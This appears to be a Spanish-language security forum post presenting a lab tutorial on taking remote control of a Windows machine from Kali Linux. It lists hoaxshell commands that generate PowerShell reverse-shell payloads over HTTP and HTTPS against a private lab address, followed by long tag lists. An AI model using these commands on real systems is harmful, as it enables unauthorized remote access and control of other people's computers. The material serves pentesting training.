CONTROLAR WINDOWS REMOTAMENTE con KALI LINUX | SEGURIDAD INFORMATICA

Avatar de Usuario
admin
Verified
Site Admin
Mensajes: 2046
Registered for: 8 years 4 months
8
Ubicación: Ciudad de Córdoba - Argentina
Gender:
Edad: 39
Contactar:

CONTROLAR WINDOWS REMOTAMENTE con KALI LINUX | SEGURIDAD INFORMATICA

#1

Mensaje por admin »

Usaremos una herramienta de pentesting donde el trafico de conexion inversa esta basada
en http y https. En este caso se usa un payload en powershell


Imagen
 
LABORATORIO de PRUEBAS

Imagen
 
COMANDOS

Código: Seleccionar todo

Basic shell session over HTTP

python3 hoaxshell.py -s 192.168.1.183    base64 encoded for convenience.

python3 hoaxshell.py -s 192.168.1.183 -r   payload raw

whoami

python3 hoaxshell.py -s 192.168.1.183 -x "C:\Users\roger\eia.ps1"   "crear archivo"

python3 hoaxshell.py -s 192.168.1.183 -x "E:\videos\2022\Cuartatandafinal\newvideopowershell\ejemplo"   "crear archivo"

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365  "Crear Certificado"

Encrypted shell session (HTTPS)

python3 hoaxshell.py -s 192.168.1.183 -c cert.pem -k key.pem   "ejecutar via https" Encrypted shell session (https)


python3 hoaxshell.py -s 192.168.1.183 -r -c cert.pem -k key.pem "payload raw en https"
LINKS

 https://github.com/t3l3machus/hoaxshell
 https://hakin9.org/hoaxshell-an-unconve ... s-traffic/

VIDEO TUTORIAL



reverse-shell
powershell
hacking
python3
penetration-testing
red-teaming
pentesting-tools
Seguridad INFORMATICA
Installation and configuration
Get Full Control On Windows By Browser
How to use
Como usar
Acceder y tener controla total de tu telefono via explorador web
Remotely
Pentesting
framework
python
perl
synology
xpenology
ruby
microsoft windows
Security Technologies
Ransomware
Sistema operativo
Operating Systems
Scanner
Apache
Remote
Remota
Desde Internet
A través de Internet
Instalar
Instalación y configuración
smartphone
Install and configure
acceder a windows con metasploit
atacar ftp con metasploit
explotar ftp con metasploit,ataque a celular android con metasploit
post explotacion con metasploit
establecer una sesion de metasploit
activar escritorio remoto
ataque con metasploit a celular android
explotar vulnerabilidades con metasploit
ataque con metasploit acceder remotamente
instalar kali linux en vmware
kali linux tutorial for beginners
instalar kali linux en virtualbox
registro de windows
comandos
scanner,learn security,unix,ubuntu,debian,OSINT,
oscp certification,ceh,try hack me,hacking,ethical hacker,
ctf for beginners,ehtical hacking,cyber seguridad,security,linux,tool,
penetration tests,herramienta,linux for ethical hackers,BUG,capacitacion,educacion,
How Hackers Do It,cyber security,bug,exploit,tutorial,proteger computadoras,
Information Systems Security Professional,como usar kali linux,metasploit
,LAN,network, https,ssl,http

Enlace:
BBCode:
HTML:
Ocultar enlaces al mensaje
Mostrar enlaces al mensaje
Responder

Create an account or sign in to join the discussion

You need to be a member in order to post a reply

Create an account

Not a member? register to join our community
Members can start their own topics & subscribe to topics
It’s free and only takes a minute

Registrarse

Sign in

  • Temas similares
    Respuestas
    Vistas
    Último mensaje

Volver a “Redes/Networking”

¿Quién está conectado?

Usuarios navegando por este Foro: No hay usuarios registrados visitando el Foro y 1 invitado